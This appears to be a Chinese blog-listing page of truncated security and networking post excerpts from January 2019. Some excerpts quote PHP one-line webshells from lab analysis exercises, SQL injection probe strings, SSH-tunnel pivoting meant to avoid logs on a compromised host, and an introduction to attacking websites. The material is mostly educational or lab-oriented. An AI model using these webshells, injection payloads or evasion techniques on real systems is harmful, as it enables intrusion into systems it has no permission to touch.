1

ssh隧道的妙用

场景说明:A主机和B主机在同一个园区网,A主机可以出公网,B主机不可以出公网。渗透工程师已经拿下A主机控制权。 一、如何在外网访问到B主机 方案:ssh本地端口映射背景:当我们拿下A主机之后想和B主机通信,可以选择直接在A主机上进行操作,但这样会留下相关日志,增加了被发现的风险。此时可以通过ssh隧 ...

白桦林_HK 发布于 2019-01-31 18:54 评论(0)阅读(2013)
0

cloudflare 加https、加SSL(加CF处理)实操流程

建站过程中,少不了SSL证书等cf添加操作,cf,即cloudflare的简写 首先,点击如图“Add site”,弹出输入框后,填写已在如阿里云、goDaddy、freedom等域名平台购买的域名; 添加后,弹出以下界面,直接点next按钮就行; 选择第一个免费的项;点击确认,下步; 一直确认即可 ...

慕柳先生 发布于 2019-01-30 16:10 评论(0)阅读(1353)
0

ctf入门常见类别

原视频在这里:实验吧-名师指导http://www.shiyanbar.com/course-video/watch-video/cid/419/vid/2000网络安全从业者尝试介绍 web应用渗透测试技术分类:扫描技术;注入技术;上传技术;钓鱼攻击。 1. 扫描技术:与防火墙、入侵检测系统相互配 ...

IT小白喘喘 发布于 2019-01-29 21:37 评论(0)阅读(48)
0

(转) vpn连接上了后不能上网(解决方法)

https://zhidao.baidu.com/question/168305032.html 我用的是VPN连接器 连接器后 不能上网页(宽带也是连接起的) 是不是要在IE局域网里设置啊?? 我用的是VPN连接器 连接器后 不能上网页(宽带也是连接起的) 是不是要在IE局域网里设置啊?? 请楼主 ...

陌翔 发布于 2019-01-29 17:32 评论(0)阅读(8)
0

以太网身份验证拨号连接

1、 找到网络连接并右键以太网选择“属性”选项 2、 查看是否有身份验证选项(如果没有请参考下一项) 3、 开启以太网 3.1、Win建+R,键入“services.msc” 3.2、查找”Wired AutoConfig”服务并设置属性 3.3、设置自动启动并启动服务 4、 选择”身份验证”再选择 ...

umeall 发布于 2019-01-28 10:58 评论(0)阅读(85)
0

关于入侵网站

如何去攻击一个网站?首先,观察指定网站。 入侵指定网站是需要条件的:要先观察这个网站是动态还是静态的。首先介绍下什么样站点可以入侵:我认为必须是动态的网站 如ASP、PHP、 JSP等代码编写的站点如果是静态的(.htm或html),一般是不会成功的。如果要入侵的目标网站是动态的,就可以利用动态网站 ...

煮酒问寒秋丿 发布于 2019-01-24 16:00 评论(0)阅读(130)
0

FTP协议详解

FTP协议详解 简介 FTP(File Transfer Protocol)是应用层的一个文件传输协议。其主要作用是在服务器和客户端之间实现文件的传输和共享。 FTP协议运行在TCP连接上 ,保证了文件传输的可靠性(运行在UDP协议上的是TFTP协议) 与Http协议区别 Http和FTP都是文件传 ...

沉默的雪糕 发布于 2019-01-23 16:30 评论(0)阅读(779)
0

slowhttptest慢攻击工具介绍

slowhttptest介绍 Slowhttptest是依赖HTTP协议的慢速攻击DoS攻击工具,设计的基本原理是服务器在请求完全接收后才会进行处理,如果客户端的发送速度缓慢或者发送不完整,服务端为其保留连接资源池占用,大量此类请求并发将导致DoS。 攻击模式 slowloris:完整的http请求 ...

manybirds 发布于 2019-01-23 16:08 评论(0)阅读(49)
0

一次VB汇编中看-溢出计算

图文记录 一.观察程序特点和运行逻辑 带弹窗 是VB开发的 需要用户名和注册码 有弹框 带弹窗 是VB开发的 需要用户名和注册码 有弹框 具备了很简单的特点…… 错误弹框,如图 二.定位 弹窗内容入手,搜索关键字定位到关键跳,nop掉或者je改jne就可以实现,即怎么输入都是正确,但不是我们的重点, ...

逆向驿站 发布于 2019-01-22 10:06 评论(0)阅读(99)
0

CM005-逆向分析过程(上篇)

005,都说比较变态,很多人给放过去了,但是我还是决定上了它,既然变态就分两篇,上篇先实际说流程,到底应该怎么上它,下篇会告诉逆向分析的过程和方法 ...

逆向驿站 发布于 2019-01-22 09:53 评论(0)阅读(119)
0

SQL手工注入漏洞测试(Sql Server数据库)

还是先找到注入点,然后order by找出字段数:4 通过SQL语句中and 1=2 union select 1,2,3……,n联合查询,判断显示的是哪些字段,就是原本显示标题和内容时候的查询字段。此处返回的是错误页面,说明系统禁止使用union进行相关SQL查询,我们得使用其他方式进行手工SQL ...

Jaxjones 发布于 2019-01-21 23:00 评论(0)阅读(632)
0

WebShell代码分析溯源(第1题)

<?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?> assert,是php代码执行函数,与eval()有同样的功能,assert()函数中参数为表达式 (或者为函数) 因为$array[ ...

Jaxjones 发布于 2019-01-21 21:23 评论(0)阅读(159)
0

在Ubuntu虚拟机上安装DVWA

1. 环境 VMware && Ubuntu //经测试,Ubuntu18.04和Ubuntu16.04.1都可以用 已经初始化的Ubuntu环境: 1没有忘记用户的密码 //自嘲 2 能连接外网 //用于获取软件 3 已更换合适的软件源 //参见 2. 安装curl 3. 安装docker 4. ...

乙梳 发布于 2019-01-19 17:05 评论(0)阅读(457)
0

计算机网络基础知识点(一)

1、网络结构分层 国际标准化组织(ISO)在1978年提出了“开放系统互联参考模型”,即著名的OSI/RM模型(Open System Interconnection/Reference Model)。它将计算机网络体系结构的通信协议划分为七层,自下而上依次为:物理层(Physics Layer)、 ...

Joyunicorn 发布于 2019-01-14 22:27 评论(1)阅读(430)
0

ping命令使用及其常用参数

PING (Packet Internet Groper),因特网包探索器,用于测试网络连接量检查网络是否连通,可以很好地帮助我们分析和判定网络故障。Ping发送一个ICMP(Internet Control Messages Protocol)即因特网信报控制协议;回声请求消息给目的地并报告是否收 ...

凌晨黄昏 发布于 2019-01-10 22:15 评论(0)阅读(5482)
0

VRP基础及操作

VRP基础及操作 前言 通用路由平台VRP(Versatile Routing Platform)是华为公司数据通信产品的通用操作系统平台,它以IP业务为核心,采用组件化的体系结构,在实现丰富功能特性的同时,提供基于应用的可裁剪和可扩展的功能。 实验拓扑 实验要求 1. 路由器AR1改名R1,AR2 ...

jasonchn 发布于 2019-01-10 21:01 评论(0)阅读(420)
0

WebShell代码分析溯源(第1题)墨者学院

一、访问链接 二、下载系统源码后直接放到D盾里扫描,扫到后门文件 三、查看该木马文件 <?php error_reporting(0); $_GET['POST']($_POST['GET']);?> 1.error_reporting(0); 关闭错误报告 2.$_GET['POST']($_PO ...

Jaxjones 发布于 2019-01-10 19:46 评论(0)阅读(141)
0

Linux DDos防御

今天要说的就是一款能够自动屏蔽DDOS攻击者IP的软件:DDoS deflate。 DDoS deflate介绍 DDoS deflate是一款免费的用来防御和减轻DDoS攻击的脚本。它通过netstat监测跟踪创建大量网络连接的IP地址,在检测到某个结点超过预设的限 制时,该程序会通过APF或IP ...

ArchitecTang 发布于 2019-01-10 14:46 评论(0)阅读(105)
0

sql注入语句整理

1.判断有无注入点; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等..and 0<>(select count(*) from *)and 0<>(select count(*) from admin) 判断是否 ...

茶乐乐 发布于 2019-01-10 08:33 评论(0)阅读(107)
0

安全建设之平台搭建

一、信息搜集类 基础信息 基础信息搜集包括ip,域名,端口,框架,组件信息。Ip、域名甲方可通过运维同事获取,其他获取方式仁者见仁智者见智。端口,需要我们根据获取的域名、ip进行端口扫描,这里推荐masscan、nmap,写调度脚本入库处理,记录并对比是一个持久的工作,并对端口做服务探测,有时会有不 ...

虚拟化的弄潮儿 发布于 2019-01-09 22:36 评论(0)阅读(74)